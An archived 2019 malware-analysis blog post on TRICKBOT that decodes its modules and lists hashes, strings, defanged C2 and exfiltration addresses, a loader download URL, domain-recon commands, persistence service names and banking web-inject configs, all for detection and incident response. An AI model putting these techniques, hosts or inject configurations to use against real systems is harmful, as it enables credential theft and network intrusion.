{
	"id": "3303a112-5cc4-4122-9570-bd4f34e44d37",
	"created_at": "2026-04-06T00:17:00.676655Z",
	"updated_at": "2026-04-10T03:23:38.790469Z",
	"deleted_at": null,
	"sha1_hash": "6321d907e9bd2d117363b0075415a26d8f449c97",
	"title": "TRICKBOT ANALYSIS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 482553,
	"plain_text": "TRICKBOT ANALYSIS\r\nBy Mark R\r\nPublished: 2019-05-22 · Archived: 2026-04-05 19:44:54 UTC\r\nTRICKBOT is an info-stealer/banking trojan which is currently under active development and has various\r\nmodules to grab credentials, move laterally, steal data and provide remote access.\r\nI recently spent some time walking through this so I've compiled a few tools/techniques out there to decode and\r\nanalyse each of the TRICKBOT modules - it's super simple and very effective! The idea here is to provide\r\nawareness, help with detections and aid incident response. I'm no reverse engineer but I get enough done to\r\nproduce a few IOCs and some basic understanding of its functionality to scope response. It's all about that\r\ncontext! 😉\r\nI can see where a lot of the OSINT reports on TRICKBOT are compiled from now. Another post can be made on\r\nthe original infection vector, created persistence, removal and other network-related IOCs from PCAP data.\r\nIf you don't already have an active infected host, download the @malware_traffic 2019-04-27 TRICKBOT\r\nSAMPLE 👍👍👍\r\nPython 2.7 + pip + easy_install pycrypt ✔✔✔\r\n@hasherezade TRICKBOT BOTKEY 🔑 creator (exe) (source)\r\n32E1293B4B5B212342C131E11B07B4B501DAFCEBB9B3E6B19CC738D7F4571498\r\n@hasherezade TRICKBOT AES config decoder (source)\r\nFireEye Labs Obfuscated String Solver (FLOSS) - strings analysis. 
https://github.com/fireeye/flare-floss\r\nCyberChef for extracting URLs/domains/IPs, sorting, filtering, defanging etc.\r\nhttps://gchq.github.io/CyberChef/#recipe=Extract_URLs(false)Defang_URL(true,true,true,'Valid domains\r\nand full URLs')\r\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nPage 1 of 20\n\nOnce you have those downloaded, it's just as easy as follows:\r\nSteps\r\n1️⃣ Run the BOTKEY retrieval on the infected host.\r\n2️⃣ Once you have that, specify and decode.\r\nconfig_decode.py --botkey {KEY} --datafile C:\\Users\\USER\\AppData\\Roaming\\gpuDriver\\Data\\pwgrab64\r\nThis will dump the decrypted .dll ready for analysis. Do this for each module. Repeat this step for the config files\r\nin the module-named folders.\r\n3️⃣ Run through with FLOSS and redirect to an output file if needed:\r\nfloss32.exe C:\\Users\\USER\\AppData\\Roaming\\gpuDriver\\Data\\MODULE.dll \u003e MODULE.txt\r\nThese are the updated versions I was playing with on my infected host.\r\nTRICKBOT Modules 19052019.\r\nConfiguration Location:\r\nC:\\Users\\*\\AppData\\Roaming\\gpuDriver\\Data\\*\r\n( %APPDATA%\\gpuDriver\\Data\\ )\r\nModule SHA256 Hashes\r\nimportDll64.dll 844974A2D3266E1F9BA275520C0E8A5D176DF69A0CCD5135B99FACF798A5D209\r\ninjectDll64.dll 8C5C0D27153F60EF8AEC57DEF2F88E3D5F9A7385B5E8B8177BAB55FA7FAC7B18\r\nmailsearcher64.dll 9CFB441EB5C60AB1C90B58D4878543EE554ADA2CCEEE98D6B867E73490D30FEC\r\nnetworkDll64.dll BA2A255671D33677CAB8D93531EB25C0B1F1AC3E3085B95365A017463662D787\r\nNewBCtestDll64.dll BF38A787AEE5AFDCAB00B95CCDF036BC7F91F07151B4444B54165BB70D649CE5\r\npsfin64.dll 8CD75FA8650EBCF0A6200283E474A081CC0BE57307E54909EE15F4D04621DDE0\r\npwgrab64.dll 1E90A73793017720C9A020069ED1C87879174C19C3B619E5B78DB8220A63E9B7\r\nshareDll64.dll 05EF40F7745DB836DE735AC73D6101406E1D9E58C6B5F5322254EB75B98D236A\r\nsysteminfo64.dll 
083CB35A7064AA5589EFC544AC1ED1B04EC0F89F0E60383FCB1B02B63F4117E9\r\nvncDll64.dll DBD534F2B5739F89E99782563062169289F23AA335639A9552173BEDC98BB834\r\nwormDll64.dll D5BB8D94B71D475B5EB9BB4235A428563F4104EA49F11EF02C8A08D2E859FD68\r\nString Analysis\r\nJust to give a rough understanding of each module's output I've dumped interesting strings. Most of the output\r\nseen here matches the OSINT reports I've read. TRICKBOT's core modules at the time of writing:\r\nsysteminfo64\r\nnetworkDll64\r\npsfin64\r\nwormDll64\r\nsharedll64\r\npwgrab64\r\ninjectDll64\r\nimportDll64\r\nvncDll64\r\nnewBCtestDll64\r\nAlso of note: there is the main configuration file at C:\\Users\\*\\AppData\\Roaming\\gpuDriver\\Data\\settings.ini\r\nbut I was unable to decode it via the scripts from hasherezade's repo - more reversing/unpacking is needed and I will\r\nsave that for another post. Using Process Hacker to analyse the hollowed-out SVCHOST process memory you\r\ncan see similar results anyway:\r\nI had previously captured a bigger list upon process start-up and saved that, which provides more connections\r\n(probably downloading the latest config version?):\r\n0x12f6f50 (14): 5[.]190[.]90[.]5:449\r\n0x1312560 (18): 37[.]255[.]200[.]157:449\r\n0x1312590 (16): 91[.]98[.]159[.]58:449\r\n0x13125c0 (18): 190[.]215[.]52[.]165:449\r\n0x13125f0 (18): 85[.]133[.]183[.]174:449\r\n0x1312620 (16): 2[.]184[.]90[.]173:449\r\n0x1312650 (16): 31[.]47[.]55[.]106:449\r\n0x1312680 (18): 94[.]101[.]182[.]156:449\r\n0x13126b0 (18): 93[.]115[.]146[.]119:449\r\n0x13126e0 (17): 201[.]56[.]193[.]18:449\r\n0x1312710 (18): 177[.]92[.]249[.]187:449\r\n0x1312740 (18): 187[.]61[.]106[.]223:449\r\n0x1312770 (18): 187[.]61[.]107[.]140:449\r\n...\r\nSee bottom for more IOCs.\r\nAlso, analyse Wireshark/PCAP data for the User-Agent it uses when POSTing back data from the infected host.\r\nPOST /ono1/WINDOWS7_W617601.0CE242D310E5CDC6F2CB8132FBD9B404/83/ 
HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC\r\nHost: 186.159.1.217\r\nQuickly querying those C2 addresses, most seem to have a commonality of MikroTik-based devices - either that or\r\nShodan is misrepresenting that port. Further digging can be done later on this.\r\nPorts:\r\n 21/tcp MikroTik router ftpd (6.43.2)\r\n 2000/tcp MikroTik bandwidth-test server\r\n 8080/tcp MikroTik http proxy\r\nPorts:\r\n 21/tcp MikroTik router ftpd (6.42.5)\r\n 2000/tcp MikroTik bandwidth-test server\r\n 8080/tcp MikroTik http proxy\r\nPorts:\r\n 2000/tcp MikroTik bandwidth-test server\r\nPorts:\r\n 21/tcp MikroTik router ftpd (6.43.12)\r\n 2000/tcp MikroTik bandwidth-test server\r\n 8080/tcp MikroTik http proxy\r\nPorts:\r\n 21/tcp MikroTik router ftpd (6.40.4)\r\n 2000/tcp MikroTik bandwidth-test server\r\nBack to the string analysis of the TRICKBOT modules...\r\nsysteminfo64\r\nBasic information on the host. 
Noticed the registry key lookup to gather installed applications as well as WMI\r\nqueries.\r\nSELECT * FROM Win32_OperatingSystem\r\nSELECT * FROM Win32_Processor\r\nSELECT * FROM Win32_ComputerSystem\r\nSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\r\nu\"SELECT * FROM Win32_OperatingSystem\"\r\nu\"CSDVersion\"\r\nu\"SELECT * FROM Win32_Processor\"\r\nu\"\u003ccpu\u003e%s\u003c/cpu\u003e\\r\\n\"\r\nu\"SELECT * FROM Win32_ComputerSystem\"\r\nu\"\u003cram\u003e%s\u003c/ram\u003e\\r\\n\"\r\nu\"\u003cusers\u003e\\r\\n\"\r\nu\"\u003cuser\u003e%s\u003c/user\u003e\\r\\n\"\r\nu\"\u003c/users\u003e\\r\\n\"\r\nu\"DisplayName\"\r\nu\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\"\r\nu\"\u003cinstalled\u003e\\r\\n\"\r\nu\"DisplayName\"\r\nu\"\u003cprogram\u003e%s\u003c/program\u003e\\r\\n\"\r\nu\"\u003c/installed\u003e\\r\\n\"\r\nu\"DisplayName\"\r\nu\"DisplayName\"\r\nu\"\u003cservice\u003e%s\u003c/service\u003e\\r\\n\"\r\nnetworkDll64\r\nGathers system information and network/domain topology - you can see what is being leaked. 
Seems to be\r\nenumerating or looking for administrative accounts, which are all then reported back to the C2.\r\n***SYSTEMINFO***\r\nROOT\\CIMV2 SELECT * FROM Win32_OperatingSystem\r\nCSName\r\nCaption\r\nCSDVersion\r\nOSArchitecture\r\nProductType\r\nBuildType\r\nWindowsDirectory\r\nSystemDirectory\r\nBootDevice\r\nSerialNumber\r\nInstallDate\r\nLastBootUpTime\r\nRegisteredUser\r\nOrganization\r\nTotalVisibleMemorySize\r\nFreePhysicalMemory\r\nHost Name - %s\r\nOS Name - %s\r\nOS Version - %s\r\nOS Architecture - %s\r\nProduct Type - Workstation\r\nProduct Type - Domain Controller\r\nProduct Type - Server\r\nBuild Type - %s\r\nRegistered Owner - %s\r\nRegistered Organization - %s\r\nSerial Number - %s\r\nInstall Date - %02u/%02u/%04u %02d.%02d.%02d\r\nLast Boot Up Time - %02u/%02u/%04u %02d.%02d.%02d\r\nWindows Directory - %s\r\nSystem Directory - %s\r\nBoot Device - %s\r\nTotal Physical Memory - %d Mb\r\nAvailable Physical Memory - %d Mb\r\n ***PROCESS LIST***\r\n{001677D0-FD16-11CE-ABC4-02608C9E7553}\r\n{00020404-0000-0000-C000-000000000046}\r\n{109BA8EC-92F0-11D0-A790-00C04FD8D5A8}\r\ndNSHostName\r\ndescription\r\nsAMAccountName\r\nmail\r\ncomment\r\nE-mail: %s\r\n(\u0026(objectcategory=person)(samaccountname=%s))\r\nAdmin Name: %s\r\nAdmin E-mail: %s\r\n(\u0026(objectcategory=person)(mail=*))\r\n(\u0026(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))\r\nList of domains:\r\nLDAP://%s\r\nAdministrator\r\nAdministrateur\r\nRiarth\r\nAmministratore\r\nAdminisztr\r\nAdministr\r\nrnandi\r\nAdministrators\r\nAdministratorius\r\nHallintomies\r\nAdministrat\r\nAdministraator\r\nAdministrador\r\nnetici\r\n***LOCAL MACHINE DATA***\r\nUser name: %s\r\nComputer name: %s\r\nSite name: %s\r\nDomain shortname: %s\r\nDomain name: %s\r\nForest name: %s\r\nDomain controller: %s\r\nForest trees:\r\n%d %s\r\n/%s/%s/90\r\nContent-Type: multipart/form-data; 
boundary=%s\r\ntest\r\nPOST\r\n--%s\r\nContent-Disposition: form-data; name=\"proclist\"\n--%s\nContent-Disposition: form-data; name=\"sysinfo\"\n--%s--\nc ipconfig /all\n/c net config workstation\n/c net view /all\n/c net view /all /domain\n/c nltest /domain_trusts\n/c nltest /domain_trusts /all_trusts\nDecoded 'dpost' config C:\\Users*\\AppData\\Roaming\\gpuDriver\\Data\\networkDll64_configs\nhxxp[://]75[.]183[.]130[.]158:8082\nhxxp[://]186[.]10[.]243[.]70:8082\nhxxp[://]75[.]183[.]130[.]158:8082\nhxxp[://]186[.]183[.]151[.]194:8082\nhxxp[://]181[.]129[.]160[.]10:8082\nhxxp[://]181[.]115[.]156[.]218:80\nhxxp[://]200[.]21[.]51[.]30:80\nhxxp[://]36[.]91[.]93[.]114:80\nhxxp[://]97[.]87[.]127[.]198:80\nhxxp[://]190[.]152[.]125[.]162:80\nhxxp[://]185[.]117[.]73[.]140:443\nhxxp[://]185[.]183[.]97[.]37:443\nhxxp[://]85[.]209[.]162[.]148:443\nhxxp[://]192[.]210[.]152[.]190:443\nhxxp[://]185[.]183[.]96[.]219:443\nhxxp[://]185[.]244[.]150[.]148:443\npsfin64\nPoint-of-Sale 'recon' module. These are high-end targets to steal financial details from, think tills, kiosks, payment\nterminals. Proactively finding and securing these in your environment could help prevent further damage - patch,\nuse unique local Administrative credentials, segregate (VLAN/FW), disable ADMIN$ shares etc. 
You can see the\nkeyword searches via LDAP/AD.\n\"%s/%s/90\"\nu\"Content-Type: multipart/form-data; boundary=%s\"\n\"SendReport\"\n\"Report successfully sent\"\n\"Dpost servers unavailable\"\nu\"--%s\\r\\nContent-Disposition: form-data; name=\\\"proclist\\\"\\r\\n\\r\\n\"\r\nu\"Empty\\r\\n\"\r\nu\"--%s\\r\\n\"\r\nu\"Content-Disposition: form-data; name=\\\"sysinfo\\\"\\r\\n\\r\\n\"\r\nu\"--%s--\\r\\n\\r\\n\"\r\nDecoded 'dpost' config C:\\Users*\\AppData\\Roaming\\gpuDriver\\Data\\psfin64_configs\r\n\u003cdpost\u003e\r\n\u003chandler\u003ehxxp[://]75[.]183[.]130[.]158:8082\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]186[.]10[.]243[.]70:8082\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]75[.]183[.]130[.]158:8082\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]186[.]183[.]151[.]194:8082\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]181[.]129[.]160[.]10:8082\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]181[.]115[.]156[.]218:80\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]200[.]21[.]51[.]30:80\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]36[.]91[.]93[.]114:80\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]97[.]87[.]127[.]198:80\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]190[.]152[.]125[.]162:80\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]185[.]117[.]73[.]140:443\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]185[.]183[.]97[.]37:443\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]85[.]209[.]162[.]148:443\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]192[.]210[.]152[.]190:443\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]185[.]183[.]96[.]219:443\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]185[.]244[.]150[.]148:443\u003c/handler\u003e\r\n\u003c/dpost\u003e\r\nwormDll64\r\nDownloads a .png (.exe) from hxxp://54.38.127[.]23/worming.png the 
TRICKBOT loader to prep for lateral\r\nmovement. Also checks to see if the host is in a domain or not by using LDAP queries. Seems to use lateral\r\nmovement via shares (T1077) using the pysmb library.\r\npysmb is an experimental SMB/CIFS library written in Python. It implements the client-side\r\nSMB/CIFS protocol (SMB1 and SMB2) which allows your Python application to access and transfer\r\nfiles to/from SMB/CIFS shared folders like your Windows file sharing and Samba folders.\r\nhxxp://54.38.127[.]23/worming.png\r\nclnProekto.exe\r\n74E6723E9DC7126D4864DCBC41C6B5DAB7AD2A9F56D0C0F94593BA88BDCA1D58\r\nhttps://urlhaus.abuse.ch/url/198254/\r\nhxxp://54.38.127[.]23/worming.png\r\n{001677D0-FD16-11CE-ABC4-02608C9E7553}\r\n{00020404-0000-0000-C000-000000000046}\r\n{109BA8EC-92F0-11D0-A790-00C04FD8D5A8}\r\nname\r\n(objectCategory=computer)\r\ndNSHostName\r\n(\u0026(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))\r\n*****MACHINE IN DOMAIN*****\r\nLDAP://%ls\r\n*****MACHINE IN WORKGROUP*****\r\nSMBs\r\npysmb\r\nSMBr\r\nNT LM 0.12\r\nSMBt\r\nSMBs\r\nSMBs\r\nWindows 7\r\n2008\r\nVista\r\nWindows 5\r\n2003\r\n\\\\%s\\IPC$\r\nDownloads the TRICKBOT loader, transfers it over to ADMIN shares and creates persistence via services using a\r\nnaming convention from the list (\"ControlInfoService\" etc.) - needs confirming. Also note the 'WormShare' function\r\nname.\r\nOther OSINT analysis:\r\nThis module appears to be meant to be used in tandem with the worm32Dll module to spread Trickbot\r\nacross local networks and shares via ETERNALBLUE SMB exploit and LDAP queries. Creates a service\r\nwith one of the names from the quoted list.\r\nThe Admin$ shares are used by Trickbot once it has brute forced the local administrator password. 
A file\r\nshare server has an IPC$ share that Trickbot queries to get a list of all endpoints that connect to it.\r\nhxxp://54.38.127[.]23/radiance.png\r\nescaped.exe\r\n5E2CEFB701B743818728ABEDE5FED4956E3ADB69BF58A56C19F5118C415A93BC\r\ncreate service?\r\nOpen sc %d\r\nStart sc 0x%x\r\nCreate sc 0x%x\r\nhxxp://54.38.127[.]23/radiance.png\r\n%s\\C$\\escaped.exe\r\nControlInfoService\r\n%SystemRoot%\\system32\\escaped.exe\n%SystemDrive%\\escaped.exe\n%ADMIN$\\escaped.exe\nWormShare\n%\\IPC$\n%SystemDrive%\\escaped.exe\nWantRelease\n54.38.127.23\nfile.inf\n\"ControlInfoService\"\n\"ControlSystemInfoService\"\n\"ServiceInfoSys\"\n\"TechnoInfoService\"\n\"AdvancedInfoService\"\n\"ServiceInfo\"\n\"InfoService\"\n\"ServiceInfoControl\"\npwgrab64\nGrabs passwords from various spots, seen here querying Chrome/IE password storage. OSINT reports suggest\nRDP (CredEnumerateA API ref), VNC and PuTTY.\nSoftware\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2\nyesyes\n\nhxxp[://]186[.]159[.]1[.]217:8082\nhxxp[://]186[.]10[.]243[.]70:8082\nhxxp[://]75[.]183[.]130[.]158:8082\nhxxp[://]186[.]183[.]151[.]194:8082\nhxxp[://]181[.]129[.]160[.]10:8082\nhxxp[://]181[.]57[.]97[.]138:80\nhxxp[://]200[.]21[.]51[.]30:80\nhxxp[://]191[.]103[.]252[.]29:80\nhxxp[://]200[.]35[.]47[.]199:80\nhxxp[://]190[.]152[.]125[.]162:80\nhxxp[://]79[.]137[.]119[.]209:443\nhxxp[://]216[.]189[.]145[.]231:443\nhxxp[://]194[.]5[.]250[.]130:443\nhxxp[://]192[.]210[.]152[.]190:443\nhxxp[://]195[.]123[.]240[.]31:443\nhxxp[://]89[.]46[.]223[.]252:443\ninjectDll64\nUsed for injecting into banking websites to steal credentials.\nNotice how it weakens the Chrome browser via\nSoftware\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls\nDisables enforcing Certificate Transparency requirements to the listed URLs. 
This policy allows\ncertificates for the hostnames in the specified URLs to not be disclosed via Certificate Transparency.\nThis allows certificates that would otherwise be untrusted, because they were not properly publicly\ndisclosed, to continue to be used, but makes it harder to detect misissued certificates for those hosts.\nCertificateTransparencyEnforcementDisabledForUrls\nYou can see this is the main module and purpose of TRICKBOT (steal credentials/data), so this is made up of more\nconfiguration files than any other module.\n1. DINJ config is used for ATTACK 1 - Web Injects - Server Side Injections. A web injection technique\nwhich inserts (injects) additional client-side code (e.g. HTML, JavaScript) in the rendered targeted web\npage.\n2. SINJ config is used for ATTACK 2 - Web Injects - Web Fakes. The user is redirected to a similar\nlooking site hosted on the attacker's infrastructure.\n3. DPOST - Data exfiltration IPs.\nref: https://www.cisecurity.org/white-papers/security-primer-trickbot/ 👏\nyes\nascii,81,-,x,Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls\nascii,81,-,x,Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls\nascii,81,-,x,Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls\nDecoded 
configs\nC:\\Users*\\AppData\\Roaming\\gpuDriver\\Data\\injectDll64_configs\\dpost\nhxxp[://]186[.]159[.]1[.]217:8082\nhxxp[://]186[.]10[.]243[.]70:8082\nhxxp[://]75[.]183[.]130[.]158:8082\nhxxp[://]186[.]183[.]151[.]194:8082\nhxxp[://]181[.]129[.]160[.]10:8082\nhxxp[://]181[.]57[.]97[.]138:80\nhxxp[://]200[.]21[.]51[.]30:80\nhxxp[://]191[.]103[.]252[.]29:80\nhxxp[://]200[.]35[.]47[.]199:80\nhxxp[://]190[.]152[.]125[.]162:80\nhxxp[://]79[.]137[.]119[.]209:443\nhxxp[://]216[.]189[.]145[.]231:443\nhxxp[://]194[.]5[.]250[.]130:443\nhxxp[://]192[.]210[.]152[.]190:443\nhxxp[://]195[.]123[.]240[.]31:443\nhxxp[://]89[.]46[.]223[.]252:443\nC:\\Users*\\AppData\\Roaming\\gpuDriver\\Data\\injectDll64_configs\\sinj\nsnippet\nhxxps[://]www[.]rbsdigital[.]com*\nhxxps[://]www[.]rbsdigital[.]com/default[.]aspx*\ncksaynvgcustplhbkjzrdfxaqiom[.]net\n198.46.190.28:443\nhxxps[://]www[.]nwolb[.]com*\n\u003csm\u003ehxxps[://]www[.]nwolb[.]com/default[.]aspx*\u003c/sm\u003e\r\n\u003cnh\u003ecqsawlqdxvfyrcbostmkjeuagpzi[.]net\u003c/nh\u003e\r\n\u003curl404\u003e\u003c/url404\u003e\r\n\u003csrv\u003e198.46.190.28:443\u003c/srv\u003e\r\n\u003c/sinj\u003e\r\n\u003csinj\u003e\r\n\u003cmm\u003ehxxps[://]retail[.]santander[.]co[.]uk*\u003c/mm\u003e\r\n\u003csm\u003ehxxps[://]retail[.]santander[.]co[.]uk/LOGSUK_NS_ENS/BtoChannelDriver[.]ssobto*\u003c/sm\u003e\r\n\u003cnh\u003eodsakrjtsmyalzxfdpvbgqieowch[.]com\u003c/nh\u003e\r\n\u003curl404\u003e\u003c/url404\u003e\r\n\u003csrv\u003e198.46.190.28:443\u003c/srv\u003e\r\n\u003c/sinj\u003e\r\n\u003csinj\u003e\r\n...\r\n...\r\n...\r\n...\r\nC:\\Users*\\AppData\\Roaming\\gpuDriver\\Data\\injectDll64_configs\\dinj\r\nsnippet\r\n\u003cigroup\u003e\r\n\u003cdinj\u003e\r\n\u003clm\u003e*.com/SPF/Login/Auth[.]aspx*\u003c/lm\u003e\r\n\u003chl\u003ehxxp[://]185[.]202[.]174[.]13/response[.]php\u003c/hl\u003e\r\n\u003cpri\u003e100\u003c/pri\u003e\r\n\u003csq\u003e2\u003c/sq\u003e\r\n\u003cignore_mask\u003e*.gif*\u003c/ignor
e_mask\u003e\r\n\u003cignore_mask\u003e*.jpg*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003e*.png*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003e*.js*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003e*.css*\u003c/ignore_mask\u003e\r\n\u003crequire_header\u003e*text/html*\u003c/require_header\u003e\r\n\u003c/dinj\u003e\r\n\u003cdinj\u003e\r\n\u003clm\u003e*.com/SPF/Login/favicon[.]ico?*\u003c/lm\u003e\r\n\u003chl\u003ehxxp[://]185[.]202[.]174[.]13/response[.]php\u003c/hl\u003e\r\n\u003cpri\u003e100\u003c/pri\u003e\r\n\u003csq\u003e2\u003c/sq\u003e\r\n\u003c/dinj\u003e\r\n\u003cdinj\u003e\r\n\u003clm\u003e*favicon[.]ico=f7caf50483938302d86aa228d161e435*\u003c/lm\u003e\r\n\u003chl\u003ehxxp[://]185[.]202[.]174[.]13/response[.]php\u003c/hl\u003e\r\n\u003cpri\u003e100\u003c/pri\u003e\r\n\u003csq\u003e1\u003c/sq\u003e\r\n\u003c/dinj\u003e\r\n\u003c/igroup\u003e\r\n\u003cdinj\u003e\r\n\u003clm\u003e*amazon.*\u003c/lm\u003e\r\n\u003chl\u003ehxxps[://]185[.]202[.]174[.]13:446/response[.]php?s=1527163537124692\u0026id=DeJENQHkNQsIpSv5YWb8\u003c/hl\u003e\r\n\u003cpri\u003e100\u003c/pri\u003e\r\n\u003csq\u003e2\u003c/sq\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]co[.]uk/ap/signin\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]co[.]uk/*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]co[.]uk/gp/yourstore/home*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]sellercentral[.]amazon[.]com/ap/signin*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]sellercentral[.]amazon[.]com/gp/notifications/notification-widget-internals[.]html*\u003c/igno\r\n\u003cignore_mask\u003e*popokai[.]com*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003e*.js*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]de/ap/signin\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]ca/ap/si
gnin\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]de/gp/yourstore/home*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]ca/gp/yourstore/home*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]ca/*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]de/*\u003c/ignore_mask\u003e\r\n\u003crequire_header\u003e*text/html*\u003c/require_header\u003e\r\n\u003c/dinj\u003e\r\n\u003cdinj\u003e\r\n\u003clm\u003ehxxps[://]www[.]amazon[.]co[.]uk/ap/signin\u003c/lm\u003e\r\n\u003chl\u003ehxxps[://]185[.]202[.]174[.]13:446/response[.]php?s=1527163537124692\u0026id=sL5FRia9p0kAxzAm7uXQ\u003c/hl\u003e\r\n\u003cpri\u003e100\u003c/pri\u003e\r\n\u003csq\u003e2\u003c/sq\u003e\r\n\u003cignore_mask\u003e*popokai[.]com*\u003c/ignore_mask\u003e\r\n\u003c/dinj\u003e\r\n...\r\n...\r\n...\r\ndinj and sinj are made up of a dozen more banking websites and shopping sites such as Amazon.\r\nimportDll64\r\nBrowser artefact grabber, form-data, cookies, history. Profiles the installed browser/s via an html/jscript\r\nhttps://gist.github.com/sneakymonk3y/4c372ec9b6b90e445c81de7d9ecaffd9\r\n!!\"\"##$$%%\u0026\u0026''(())**++,,--..//00112233445566778899SQLite format 3\r\nSQLITE_\r\n2017-02-13 16:02:40 ada05cfa86ad7f5645450ac7a2a21c9aa6e57d2c\r\nLooking for %s\r\n%s not found\r\nBrowser exec is: %s\r\n as\r\nconf.name\r\nconf.grabbed\r\nGetting cookies\r\nattempt %d. Cookies not found\r\nGetting html5 local storage\r\nattempt %d. Local Storage not found\r\nGetting browser history\r\nattempt %d. 
History not found\r\nGetting flash lso files\r\nbasic_string::_M_construct null not valid\r\nInternetExplorer\r\nunsupported OS\r\nSOFTWARE\\Microsoft\\Internet Explorer\\svcVersion\r\nSOFTWARE\\Microsoft\\Internet Explorer\\Version\r\nregistry access\r\nFound version %s\r\nVersion %d is not supported\r\n/internet explorer/iexplore.exe\r\nbasic_string::_M_construct null not valid\r\nSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Cookies\r\nregistry cookies path\r\nHTTP/1.1 200 OK\r\nServer: grabber\r\nIE compatible mode grabbing...\r\nHave a nice day\r\nerror listenning\r\nTrying browser communication... please wait\r\nmagic %d\r\nHiddenDesktop\r\n{URL}\r\nhttp.userAgent\r\nSuccess\r\nCould not gather browser data\r\nCompatible mode grabbing is not finished!\r\n127.0.0.1\r\nappro@openssl.org\r\nhttp://127.0.0.1\r\nhttp://www.phreedom.org/md5)\r\nhttp://bugreports.qt.io/\r\nhttp://www.openssl.org/support/faq.html\r\nhttp://www.w3.org/XML/1998/namespace\r\nhttp://www.w3.org/2000/xmlns/\r\nhttp://gcc.gnu.org/bugs.html):\r\nC:\\temp\\qt-common\r\nC:\\temp\\qt-user\r\nc:\\users\\root\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat\r\nvncDll64\r\nRemote Control - VNC module. 
Could be similar tooling such as http://vncproxy.sourceforge.net/proxy.html.\r\nOutlook is being referenced - not sure if this is more a screen-grabbing module for reading emails/security codes?\r\n185.172.129[.]11\r\nRSDS/\r\nC:\\Users\\MaxMikhaylov\\Documents\\Visual Studio 2010\\MMVNC.PROXY\\VNCSRV\\x64\\Release\\VNCSRV.pdb\r\nvncsrv.dll\r\n\"WinSta0\\\\AlterDesk01\"\r\n\" -new -noframemerging http://www.google.com\"\r\n\"Chrome_WidgetWin\"\r\n\" --allow-no-sandbox-job --no-sandbox --disable-3d-apis --disable-accelerated-layers --disable-accelerated-plugi\r\n\"MozillaWindowClass\"\r\n\" -safe-mode\"\r\n\" taskschd.msc\"\r\n\" /K schtasks.exe |more\"\r\n\"SysListView32\"\r\n\"IE.HTTP\\\\shell\\\\open\\\\command\"\r\n\"EDGE\\\\shell\\\\open\\\\command\"\r\n\"\\\\shell\\\\open\\\\command\"\r\n\"ChromeHTML\"\r\n\"FirefoxHTML\"\r\n\"\\\\mmc.exe\"\r\n\"\\\\cmd.exe\"\r\n\"\\\\explorer.exe\"\r\n\"\\\\Microsoft Office\\\\Office16\\\\outlook.exe\"\r\n\"\\\\Microsoft Office\\\\Office15\\\\outlook.exe\"\n\"\\\\Microsoft Office\\\\Office14\\\\outlook.exe\"\n\"\\\\Microsoft Office\\\\Office12\\\\outlook.exe\"\n\"\\\\Microsoft Office\\\\Office11\\\\outlook.exe\"\nnewBCtestDll64\nOSINT reports it as a reverse shell. Will confirm later with network traffic/PCAP analysis.\nyesyes\u003c\ndecoded config C:\\Users*\\AppData\\Roaming\\gpuDriver\\Data\\NewBCtestDll64_configs\n162[.]209[.]124[.]166:80\n167[.]99[.]206[.]127:80\n199[.]247[.]24[.]9:80\nConclusion:\nVery quickly you can gather IOCs and some basic understanding of the malware. 
